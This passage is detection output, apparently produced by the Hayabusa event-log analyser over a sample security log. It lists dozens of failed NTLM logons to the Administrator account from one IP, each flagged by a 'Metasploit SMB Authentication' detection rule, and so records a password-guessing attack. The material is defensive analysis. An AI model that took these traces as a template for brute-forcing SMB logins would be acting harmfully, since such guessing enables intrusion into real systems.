Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YgqavZ1SuNvX7RgH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.198 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IQvoIsfW0LhDit2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.247 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 33IPGQXc1MarY30J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: II4Ly9LnkWlq60Ux : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.353 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wncfJC7kDSI7O9Ud : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.401 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6XzbWef3PuzQK3FJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M5670HdNC6c8O56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ea8FcddgLyV5o6oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LjyhmKFdBNrHIvTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIF47pEWBMp6Nbym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6TO891WvJPkdjsct : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6cLnJYpHEzGAvhWG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gy6cFTrwrpRQFxfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gxz612Z88PMCKzAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GSPC8hibdZdyOcex : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6vlmykLeFmuhn81B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.893 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4w4lEW9w53zMFPcc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jt2lDRFWwi6adwlB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:27.970 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G9MGvle35u5OGB5o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJgLFM2vrnKuj5N3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8HRyDAzwKj9bfnA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J65LcwnRgEob9wjY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yhas9e1fwDZ1Fxvt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5qJRSpjS6tZJjNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bo4HAgP2tw0GmZ4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zv0cbLCD7E05i0g5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FIKsQLk5iPyKoeqM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RiHAaBszJBGe2deQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.394 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8em4eOiqze683Cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86lXQsnn7dae93tW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.481 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Iu8olNGPmhxh6iNu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZYtN5EMHxcNqID6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mtUQGxrMoPkpUQCS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QYh4e3bpePhDoRwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UkC8E9uKpCgD1BHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZCDxpmDZbpGCey3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SS2dxS3WvCrAyiB2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YT3VHxKNf8q14rro : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fx9HQT3u3Ig6vJ3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FukPQsr4SXRshyTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:28.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7AutKUyPELNRUcA4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 38gBkWcYdZW6Wcdz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HMKnLRQCDn1CHZdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ShGnRYHfVSuPvfcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LXVWG3Yl0utv98Zf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VDfa0UebgleQMK5U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxTLJJsWs9dOc5JC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 